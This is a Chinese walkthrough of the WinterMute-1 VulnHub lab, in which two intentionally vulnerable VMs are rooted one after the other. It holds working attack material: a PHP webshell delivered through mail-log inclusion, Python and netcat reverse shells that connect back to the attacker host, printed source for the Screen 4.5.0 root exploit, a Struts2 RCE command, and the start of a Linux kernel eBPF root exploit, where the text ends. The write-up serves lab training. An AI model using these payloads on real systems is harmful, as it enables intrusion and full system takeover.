vulnhub靶机渗透[WinterMute-1]

名称

名称：WinterMute：1
发布日期：2018年7月5日

下载

• Download: https://drive.google.com/open?id=1bHgdx0iI24jv7MDzKcrIPtd9rVFaVokR
• Download (Mirror): https://download.vulnhub.com/wintermute/Wintermute-v1.zip
• Download (Torrent): https://download.vulnhub.com/wintermute/Wintermute-v1.zip.torrent

描述

一个新的OSCP风格实验室，涉及2台易受攻击的机器，以赛博朋克经典Neuromancer为主题-任何网络安全爱好者都必须阅读。该实验室利用了数据透视和后期开发，而我发现其他OSCP预处理实验室似乎缺乏。目标是在两台计算机上都root。您只需要默认的Kali Linux。

我将其评为“中级”。没有缓冲区溢出或漏洞利用开发-可以使用小的字典进行任何必要的密码破解。它与OSCP盒而不是CTF更为相关。我已经测试了很多，但是如果您发现任何问题或需要在这里微调我。

压缩下载中包含Virtual Box Lab的安装说明，但是这里有一个简短的摘要：Straylight-模拟带有2个NICS的面向公众的服务器。首先盖上此盖，然后转到最后一台机器。Neuromancer-在具有1个NIC的非公共网络中。您的Kali框应仅与Straylight位于同一虚拟网络上。需要VirtualBox。VMware无法正确导入。

网络配置

Wintermute Vitrual Box设置指南本练习利用了数据透视，因此需要正确设置VirtualBox网络。所有动态ip都快速简便。运行或将每台计算机导入Virtual Box（文件>>导入设备）

STRAYLIGHT（网络＃1和＃2）-这是第一台获得root权限的计算机。

• Adapter 1
  • Host-only Adapter
  • VirtualBox Host-Only Ethernet Adapter #1
    Advanced (we want 2 NIC’s, each on a separate network)
  • Adapter Type - Intel PRO/1000 T Server
• Adapter 2
  • Host-only Adapter
  • VirtualBox Host-Only Ethernet Adapter #2
    Advanced
  • Adapter Type - Intel PRO/1000 MT Desktop (or other adapter type different than network #1).

NEUROMANCER（网络2）-这是获得root的最终机器。设置为具有1个网络。仅通过Straylight使用仅限主机的Eth适配器＃2访问。

• Adapter 1
  • Host-only Adapter
  • VirtualBox Host-Only Ethernet Adapter #2
    Advanced
  • Adapter Type - Intel PRO/1000 MT Desktop

KALI（网络＃1）-您的攻击机器仅应在仅主机的适配器上设置，Straylight处于打开状态，如果选择，则为NAT。-您不应该从Kali盒中对Neuromancer进行ping操作。如果可以的话，你在作弊。

• Adapter 1
  • Host-only Adapter
  • VirtualBox Host-Only Ethernet Adapter #1

网络这样设置以便于通关了STRAYLIGHT之后，再通关NEUROMANCER

Wintermute-Straylight

信息收集

上nmap

root@kali:~# nmap -sn -v 192.168.56.0/24
Nmap scan report for 192.168.56.111
Host is up (0.00011s latency).
MAC Address: 08:00:27:50:96:D9 (Oracle VirtualBox virtual NIC)

root@kali:~# nmap -p- -sV -Pn -T5 -v -A --script=vuln 192.168.56.111
PORT     STATE SERVICE VERSION
25/tcp   open  smtp    Postfix smtpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params: 
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use anonymous
|       Diffie-Hellman key exchange only provide protection against passive
|       eavesdropping, and are vulnerable to active man-in-the-middle attacks
|       which could completely compromise the confidentiality and integrity
|       of any data exchanged over the resulting session.
|     Check results:
|       ANONYMOUS DH GROUP 1
|             Cipher Suite: TLS_DH_anon_WITH_AES_256_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 2048
|             Generator Length: 8
|             Public Key Length: 2048
|     References:
|_      https://www.ietf.org/rfc/rfc2246.txt
|_sslv2-drown: 
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /manual/: Potentially interesting folder
|_http-server-header: Apache/2.4.25 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3000/tcp open  http    Mongoose httpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.111
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.111:3000/
|     Form id: 
|_    Form action: /authorize.html
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter: 
|   
|_    Couldn't find a file-type field.
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
|_http-passwd: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trane-info: Problem with XML parsing of /evox/about
| http-vuln-cve2010-0738: 
|_  /jmx-console/: Authentication was not required

访问80端口

访问3000端口

发现下方有提示说用户密码都是admin，然后直接登录

Hint: the default user and password are admin

发现有一些目录

然后访问http://192.168.56.111/turing-bolo/

点击之后显示如下

从上面的屏幕截图中，可以看到一些日志文件（突出显示）。根据经验，目录遍历，可以在浏览器中执行可写文件。因此，尝试将../../../log/mail附加到浏览器中的URL，如下所示：

http://192.168.56.111//turing-bolo/bolo.php?bolo=../../../log/mail

使用下面的url也可以

http://192.168.56.111//turing-bolo/bolo.php?bolo=/var/log/mail

getshell

有用。现在，让尝试使用telnet发送恶意邮件。在邮件主题中包括一些php代码。

root@kali:~# telnet 192.168.56.111 25
Trying 192.168.56.111...
Connected to 192.168.56.111.
Escape character is '^]'.
220 straylight ESMTP Postfix (Debian/GNU)
HELO hack.com
250 straylight
MAIL FROM: hacker@hack.com
250 2.1.0 Ok
RCPT TO: wintermute@localhost.com
454 4.7.1 <wintermute@localhost.com>: Relay access denied
RCPT TO: wintermute
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
subject: <?php system($_REQUEST['luci']); ?>
hacked!!
.
250 2.0.0 Ok: queued as EC8E454D7
quit
221 2.0.0 Bye
Connection closed by foreign host.

现在再次包含mail.log文件，但是这次发送第二个GET参数luci，该参数将执行我们的命令。

http://192.168.56.111//turing-bolo/bolo.php?bolo=/var/log/mail&luci=id

可以看到成功执行命令，现在构造以下的poc以获得一个reverse shell

http://192.168.56.111/turing-bolo/bolo.php?bolo=/var/log/mail&luci=python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.56.102',9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

可以看到kali端成功弹回了shell

root@kali:~# nc -lvp 9999
listening on [any] 9999 ...
192.168.56.109: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.109] 48508
bash: cannot set terminal process group (771): Inappropriate ioctl for device
bash: no job control in this shell
www-data@straylight:/var/www/html/turing-bolo$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@straylight:/var/www/html/turing-bolo$ whoami
whoami
www-data

提权

查看是否有可提权的SUID文件

www-data@straylight:/var/www/html/turing-bolo$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/bin/su
/bin/umount
/bin/mount
/bin/screen-4.5.0
/bin/ping
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign

在screen-4.5.0上运行searchsploit将返回漏洞，以提升权限，完美！

root@kali:~# searchsploit screen 4.5
-------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                |  Path
                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------- ----------------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation                 | exploits/linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (PoC)           | exploits/linux/local/41152.txt
-------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

看一下exp的源码

root@kali:~# cat /usr/share/exploitdb/exploits/linux/local/41154.sh
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshellr

运行以下sed命令将脚本格式换行和缩进转化一下，脚本才能正常运行

root@kali:~/41154# sed -i -e 's/\r$//' 41154.sh

root@kali:~/41154# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

转换为tty标准的shell

python -c "import pty;pty.spawn('/bin/bash')"

如下成功运行脚本，成功提权，帅爆了。。。

www-data@straylight:/var/www/html/turing-bolo$ wget http://192.168.56.102:8000/41154.sh
<ring-bolo$ wget http://192.168.56.102:8000/41154.sh
--2020-01-15 01:30:12--  http://192.168.56.102:8000/41154.sh
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1151 (1.1K) [text/x-sh]
Saving to: '41154.sh'

41154.sh            100%[===================>]   1.12K  --.-KB/s    in 0s      

2020-01-15 01:30:12 (415 MB/s) - '41154.sh' saved [1151/1151]

www-data@straylight:/var/www/html/turing-bolo$ chmod 777 *
chmod 777 *
www-data@straylight:/var/www/html/turing-bolo$ ls
ls
41154.sh      bolo.css  c7.png    css         molly.log    ta.png
armitage.log  bolo.php  case.log  index.html  riviera.log
www-data@straylight:/var/www/html/turing-bolo$ ./41154.sh
./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
/tmp/libhax.c: In function 'dropshell':
/tmp/libhax.c:7:5: warning: implicit declaration of function 'chmod' [-Wimplicit-function-declaration]
     chmod("/tmp/rootshell", 04755);
     ^~~~~
/tmp/rootshell.c: In function 'main':
/tmp/rootshell.c:3:5: warning: implicit declaration of function 'setuid' [-Wimplicit-function-declaration]
     setuid(0);
     ^~~~~~
/tmp/rootshell.c:4:5: warning: implicit declaration of function 'setgid' [-Wimplicit-function-declaration]
     setgid(0);
     ^~~~~~
/tmp/rootshell.c:5:5: warning: implicit declaration of function 'seteuid' [-Wimplicit-function-declaration]
     seteuid(0);
     ^~~~~~~
/tmp/rootshell.c:6:5: warning: implicit declaration of function 'setegid' [-Wimplicit-function-declaration]
     setegid(0);
     ^~~~~~~
/tmp/rootshell.c:7:5: warning: implicit declaration of function 'execvp' [-Wimplicit-function-declaration]
     execvp("/bin/sh", NULL, NULL);
     ^~~~~~
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# whoami
whoami
root

读取flag

# cd /root
cd /root
# ls
ls
flag.txt  note.txt  scripts
# cat note.txt
cat note.txt
Devs,

Lady 3Jane has asked us to create a custom java app on Neuromancer's primary server to help her interact w/ the AI via a web-based GUI.

The engineering team couldn't strss enough how risky that is, opening up a Super AI to remote access on the Freeside network. It is within out internal admin network, but still, it should be off the network completely. For the sake of humanity, user access should only be allowed via the physical console...who knows what this thing can do.

Anyways, we've deployed the war file on tomcat as ordered - located here:

/struts2_2.3.15.1-showcase

It's ready for the devs to customize to her liking...I'm stating the obvious, but make sure to secure this thing.

Regards,

Bob Laugh
Turing Systems Engineer II
Freeside//Straylight//Ops5
# cat flag.txt
cat flag.txt
5ed185fd75a8d6a7056c96a436c6d8aa

winterMute第一部分到此结束

• 总结：
  1.弱口令
  2.文件包含
  3.telnet发送恶意邮件写shell
  4.python reverse shell
  5.Screen 4.5.0本地提权
  6.用(sed -i -e ‘s/\r$//‘)将exp换行和缩进和格式变得可执行

Wintermute-Neuromancer

之前的note.txt向显示一个可能的网络目录。但是，当不知道Neuromancer上的哪些端口打开时，这是没有用的。查看Straylight的arp表将告诉我们Neuromancer的地址，即192.168.56.110。

# arp -a
arp -a
? (192.168.56.102) at 00:0c:29:70:75:41 [ether] on enp0s8
? (192.168.56.110) at 08:00:27:de:b9:3d [ether] on enp0s8
? (192.168.56.1) at 0a:00:27:00:00:19 [ether] on enp0s8
? (192.168.56.100) at 08:00:27:25:3d:8a [ether] on enp0s8

# ifconfig
ifconfig
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.56.111  netmask 255.255.255.0  broadcast 192.168.56.255
        inet6 fe80::a00:27ff:fe50:96d9  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:50:96:d9  txqueuelen 1000  (Ethernet)
        RX packets 771  bytes 65226 (63.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 21  bytes 2052 (2.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

enp0s8: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.56.109  netmask 255.255.255.0  broadcast 192.168.56.255
        inet6 fe80::a00:27ff:fea9:7af0  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:a9:7a:f0  txqueuelen 1000  (Ethernet)
        RX packets 197671  bytes 11899335 (11.3 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 197077  bytes 14611455 (13.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 415522  bytes 33365253 (31.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 415522  bytes 33365253 (31.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

也可以写一个脚本探测存活的主机

#!/bin/bash

for ip in $(seq 1 254); do
   ping -c 1 192.168.56.$ip | grep "bytes from" | cut -d " " -f 4 | cut -d ":" -f 1 &
done

# ./pingsweep.sh
./pingsweep.sh
192.168.56.100
192.168.56.102
192.168.56.111
192.168.56.110
192.168.56.109

其中192.168.56.102是kali的ip，192.168.56.109，和192.168.56.111都是Straylight的ip，192.168.56.100是vbox Host-only Adapter网卡的网关地址，剩下的192.168.56.110就是Neuromancer机器的ip地址。

使用nc扫描端口

# for i in $(seq 1 65535); do nc -nvz -w 1 192.168.56.110 $i 2>&1; done | grep -v "Connection refused"
for i in $(seq 1 65535); do nc -nvz -w 1 192.168.56.110 $i 2>&1; done | grep -v "Connection refused"
(UNKNOWN) [192.168.56.110] 8009 (?) open
(UNKNOWN) [192.168.56.110] 8080 (http-alt) open
(UNKNOWN) [192.168.56.110] 34483 (?) open

这里有三个开放的端口8009、8080和34483，但是问题是，如果尝试访问IP和端口，将看不到任何内容。为了能够加入它们，必须进行端口转发。对于端口转发，可以使用socat之类的socat，如socat TCP-LISTEN：5000,fork,reuseaddr tcp：127.0.0.1：8080，这意味着8080上的网站应该在外部的5000端口上可见。但是，由于需要处理三个端口，必须在每个命令的末尾加上＆。＆in nix告诉系统执行命令并将其置于后台。简而言之，将执行以下命令。

# socat TCP-LISTEN:8009,fork,reuseaddr tcp:192.168.56.110:8009 &
socat TCP-LISTEN:8009,fork,reuseaddr tcp:192.168.56.110:8009 &
# socat TCP-LISTEN:8000,fork,reuseaddr tcp:192.168.56.110:8080 &
socat TCP-LISTEN:8000,fork,reuseaddr tcp:192.168.56.110:8080 &
# socat TCP-LISTEN:34483,fork,reuseaddr tcp:192.168.56.110:34483 &
socat TCP-LISTEN:34483,fork,reuseaddr tcp:192.168.56.110:34483 &

然后上nmap

root@kali:~# nmap -sV -v -p 8009,8080,34483 -Pn -A --script=vuln 192.168.56.110
PORT      STATE SERVICE VERSION
8009/tcp  open  ajp13   Apache Jserv (Protocol v1.3)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
8080/tcp  open  http    Apache Tomcat 9.0.0.M26
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /examples/: Sample scripts
|   /manager/html/upload: Apache Tomcat (401 )
|   /manager/html: Apache Tomcat (401 )
|_  /docs/: Potentially interesting folder
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
34483/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

然后访问之前note.txt中提到的url

http://192.168.56.110:8080/struts2_2.3.15.1-showcase/showcase.action

Apache struts有一些已知的漏洞利用。当使用searchsploit搜索“apache struts”时，可以看到许多可能的利用。

root@kali:~# searchsploit apache struts
------------------------------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                                                  |  Path                                  
                                                                                                | (/usr/share/exploitdb/)                
------------------------------------------------------------------------------------------------ ----------------------------------------
Apache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit)                      | exploits/multiple/remote/24874.rb
Apache Struts - ClassLoader Manipulation Remote Code Execution (Metasploit)                     | exploits/multiple/remote/33142.rb
Apache Struts - Developer Mode OGNL Execution (Metasploit)                                      | exploits/java/remote/31434.rb
Apache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit)                    | exploits/linux/remote/39756.rb
Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities                        | exploits/multiple/webapps/18452.txt
Apache Struts - OGNL Expression Injection                                                       | exploits/multiple/remote/38549.txt
Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution                | exploits/multiple/remote/43382.py
Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution (Metasploit)   | exploits/multiple/remote/39919.rb
Apache Struts - includeParams Remote Code Execution (Metasploit)                                | exploits/multiple/remote/25980.rb
Apache Struts 1.2.7 - Error Response Cross-Site Scripting                                       | exploits/multiple/remote/26542.txt
Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit)                 | exploits/multiple/remote/27135.rb
Apache Struts 2 - Namespace Redirect OGNL Injection (Metasploit)                                | exploits/multiple/remote/45367.rb
Apache Struts 2 - Skill Name Remote Code Execution                                              | exploits/multiple/remote/37647.txt
Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit)                     | exploits/multiple/remote/44643.rb
Apache Struts 2 < 2.3.1 - Multiple Vulnerabilities                                              | exploits/multiple/webapps/18329.txt
Apache Struts 2.0 - 'XSLTResult.java' Arbitrary File Upload                                     | exploits/java/webapps/37009.xml
Apache Struts 2.0.0 < 2.2.1.1 - XWork 's:submit' HTML Tag Cross-Site Scripting                  | exploits/multiple/remote/35735.txt
Apache Struts 2.0.1 < 2.3.33 / 2.5 < 2.5.10 - Arbitrary Code Execution                          | exploits/multiple/remote/44556.py
Apache Struts 2.0.9/2.1.8 - Session Tampering Security Bypass                                   | exploits/multiple/remote/36426.txt
Apache Struts 2.2.1.1 - Remote Command Execution (Metasploit)                                   | exploits/multiple/remote/18984.rb
Apache Struts 2.2.3 - Multiple Open Redirections                                                | exploits/multiple/remote/38666.txt
Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1)                           | exploits/linux/remote/45260.py
Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2)                           | exploits/multiple/remote/45262.py
Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasp | exploits/multiple/remote/41614.rb
Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution                             | exploits/linux/webapps/41570.py
Apache Struts 2.3.x Showcase - Remote Code Execution                                            | exploits/multiple/webapps/42324.py
Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution                          | exploits/linux/remote/42627.py
Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploi | exploits/multiple/remote/41690.rb
Apache Struts < 2.2.0 - Remote Command Execution (Metasploit)                                   | exploits/multiple/remote/17691.rb
Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection                              | exploits/multiple/webapps/44583.txt
------------------------------------------------------------------------------------------------ ----------------------------------------

从github上面clone struts-pwn项目

root@kali:~/struts-pwn# python3 struts-pwn.py -u http://192.168.56.110:8080/struts2_2.3.15.1-showcase/showcase.action --check

[*] URL: http://192.168.56.110:8080/struts2_2.3.15.1-showcase/showcase.action
[*] Status: Vulnerable!
[%] Done.

表示存在CVE:2017-5638 - Apache Struts2 S2-045漏洞

getshell

然后运行下面命令获得一个revese shell

root@kali:~/struts-pwn# python3 struts-pwn.py -u http://192.168.56.110:8080/struts2_2.3.15.1-showcase/showcase.action -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f"

[*] URL: http://192.168.56.110:8080/struts2_2.3.15.1-showcase/showcase.action
[*] CMD: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f
EXCEPTION::::--> HTTPConnectionPool(host='192.168.56.110', port=8080): Read timed out. (read timeout=3)
ERROR
[%] Done.

nc命令获得可交互的shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f

成功的弹回了shell

root@kali:~# nc -lvp 9999
listening on [any] 9999 ...
192.168.56.110: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.110] 55378
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(ta) gid=1000(ta) groups=1000(ta),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
$ whoami
ta

获得了Neuromancer的权限！检查“ta”用户的home目录将显示一些有趣的内容。此注释将显示tomcat目录。

$ cat ai-gui-guide.txt
Application for Neuromancer remote access interface includes:

-Maven    - /opt/
-Java jdk - /usr/lib/jvm/
-Tomcat   - /usr/local/tomcat/
-Struts2  - /home/ta/myWebApp/
          - war files are in /root. Update these ASAP to improve security.

Reduce installation of apps to ONLY what's needed, seucure configurations and follow app security best practices.

Tomcat将用户和密码存储在名为“tomcat-users.xml”的文件中。读取该文件将显示系统上另一个用户“lady3jane”的密码。

$ cat tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
<!--
Eng.,

Tomcat is still using basic auth. I encoded the password so the AI's security scans don't flag it.

Is this what Bob keeps talking about, "Security by obscurity?"

Ed Occam//Sys.Engineer I//Night City
"Harry, I took care of it" - Llyod Christmas
-->

  <role rolename="manager-gui"/>
  <user username="Lady3Jane" password="&gt;&#33;&#88;&#120;&#51;&#74;&#97;&#110;&#101;&#120;&#88;&#33;&lt;" roles="manager-gui"/>

<!--
  <role rolename="role1"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
-->
</tomcat-users>

• 此外还可以通过struts 2漏洞利用工具来上传冰蝎木马来getshell :)

提权1

将

>!Xx3JanexX!<

html编码解密得到：>!Xx3JanexX!<

然后使用：lady3jane/>!Xx3JanexX!<连接ssh

root@kali:~# ssh lady3jane@192.168.56.110 -p 34483
 ----------------------------------------------------------------
|                Neuromancer Secure Remote Access                |
| UNAUTHORIZED ACCESS will be investigated by the Turing Police  |
 ----------------------------------------------------------------
lady3jane@192.168.56.110's password: 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

94 packages can be updated.
44 updates are security updates.


Last login: Wed Jan 15 23:19:21 2020 from 192.168.56.102
lady3jane@neuromancer:~$ id
uid=1001(lady3jane) gid=1001(lady3jane) groups=1001(lady3jane)
lady3jane@neuromancer:~$ whoami
lady3jane

现在，在lady3jane的主目录中，有一个文件可能每隔几分钟就会由cron执行一次。

lady3jane@neuromancer:~$ cat custom-tomcat-chk.sh
#!/bin/bash
# Health check for Neuromancer (root) to execute every 3 minutes.
# ..the AI tells me it can maintain security, server health, etc w/o forced intervention,
# but I beg to differ...hence the cron script.

> /tmp/tomcat_status.log

health=$(curl -m 5 -Is 127.0.0.1:8080 |grep HTTP/1.1)

case "$health" in

  *200*)
        echo "Tomcat is Up" > /tmp/tomcat_status.log
        ;;
  *)
        echo "Tomcat is down" > /tmp/tomcat_status.log
        ;;
  esac

但是，无法利用这一点。看来这将永远不会被执行。因此，决定改用易受攻击的内核。可以找到所使用的内核漏洞的链接Linux-Kernel-4-4-0-116-Ubuntu-16-04-4-LocalPrivilege-Escalation

来看一下内核提权的exp，很美。。。我何时才能达到这种水平呢？？？ :):):):):):):):):):):):)

root@kali:~# cat 44298.c 
/*
 * Ubuntu 16.04.4 kernel priv esc
 *
 * all credits to @bleidl
 * - vnik
 */

// Tested on:
// 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64
// if different kernel adjust CRED offset + check kernel stack size
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <stdint.h>

#define PHYS_OFFSET 0xffff880000000000
#define CRED_OFFSET 0x5f8
#define UID_OFFSET 4
#define LOG_BUF_SIZE 65536
#define PROGSIZE 328

int sockets[2];
int mapfd, progfd;

char *__prog =  "\xb4\x09\x00\x00\xff\xff\xff\xff"
                "\x55\x09\x02\x00\xff\xff\xff\xff"
                "\xb7\x00\x00\x00\x00\x00\x00\x00"
                "\x95\x00\x00\x00\x00\x00\x00\x00"
                "\x18\x19\x00\x00\x03\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00"
                "\xbf\x91\x00\x00\x00\x00\x00\x00"
                "\xbf\xa2\x00\x00\x00\x00\x00\x00"
                "\x07\x02\x00\x00\xfc\xff\xff\xff"
                "\x62\x0a\xfc\xff\x00\x00\x00\x00"
                "\x85\x00\x00\x00\x01\x00\x00\x00"
                "\x55\x00\x01\x00\x00\x00\x00\x00"
                "\x95\x00\x00\x00\x00\x00\x00\x00"
                "\x79\x06\x00\x00\x00\x00\x00\x00"
                "\xbf\x91\x00\x00\x00\x00\x00\x00"
                "\xbf\xa2\x00\x00\x00\x00\x00\x00"
                "\x07\x02\x00\x00\xfc\xff\xff\xff"
                "\x62\x0a\xfc\xff\x01\x00\x00\x00"
                "\x85\x00\x00\x00\x01\x00\x00\x00"
                "\x55\x00\x01\x00\x00\x00\x00\x00"
                "\x95\x00\x00\x00\x00\x00\x00\x00"
                "\x79\x07\x00\x00\x00\x00\x00\x00"
                "\xbf\x91\x00\x00\x00\x00\x00\x00"
                "\xbf\xa2\x00\x00\x00\x00\x00\x00"
                "\x07\x02\x00\x00\xfc\xff\xff\xff"
                "\x62\x0a\xfc\xff\x02\x00\x00\x00"
                "\x85\x00\x00\x00\x01\x00\x00\x00"
                "\x55\x00\x01\x00\x00\x00\x00\x00"
                "\x95\x00\x00\x00\x00\x00\x00\x00"
                "\x79\x08\x00\x00\x00\x00\x00\x00"
                "\xbf\x02\x00\x00\x00\x00\x00\x00"
                "\xb7\x00\x00\x00\x00\x00\x00\x00"
                "\x55\x06\x03\x00\x00\x00\x00\x00"
